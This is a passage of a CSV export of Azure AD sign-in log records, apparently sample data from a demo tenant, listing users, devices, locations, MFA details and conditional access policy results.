'4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:59,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",1fc6d415-116e-44c9-a4fc-b8ef06cf0600,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,1fc6d415-116e-44c9-a4fc-b8ef06cf0600,SigninLogs,Sucess,13,105
+31,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:09.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,10e74289-d0ba-4f40-bfc4-2a3f434bf215,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",189268ff-d871-4dc4-914e-2c96e1f70700,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,189268ff-d871-4dc4-914e-2c96e1f70700,SigninLogs,Sucess,13,105
+32,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:07.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1f25371-bcc3-4fea-85fb-281a7f1706c2,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f4c49c86-cb9e-4a04-9dcc-1dcd24040c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f4c49c86-cb9e-4a04-9dcc-1dcd24040c00,SigninLogs,Sucess,36.6404686,-78.26995087
+33,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:51.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,80689f97-dedc-415e-b0f9-3ae80b05964b,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",b58c6208-3745-40bc-8745-ecaa252e0800,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,b58c6208-3745-40bc-8745-ecaa252e0800,SigninLogs,Sucess,50.6406517,5.572050095
+34,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,30:37.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 11:30,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",69bf3c7f-96b8-4aae-959c-a7bb27b50a00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,69bf3c7f-96b8-4aae-959c-a7bb27b50a00,SigninLogs,Sucess,33.0175209,35.44601059
+35,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:50.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,221a3635-e823-42aa-888e-0d7b1378e44a,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",42ec543f-db91-4d87-b07f-74fdc7e80a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,42ec543f-db91-4d87-b07f-74fdc7e80a00,SigninLogs,Sucess,50.6406517,5.572050095
+36,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:23.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",8046174b-712f-40d9-9f4e-13cd170b0c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,8046174b-712f-40d9-9f4e-13cd170b0c00,SigninLogs,Sucess,50.6406517,5.572050095
+37,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:14.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,abc8469f-7091-0000-54b3-302772a2dcfb,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b777fe1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,669c457e-4441-4eab-88a8-07b777fe1100,SigninLogs,Sucess,33.7984581,-84.38828278
+38,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,59:46.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4b783129-84d5-440d-8448-fd7b4b68e5c4,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': 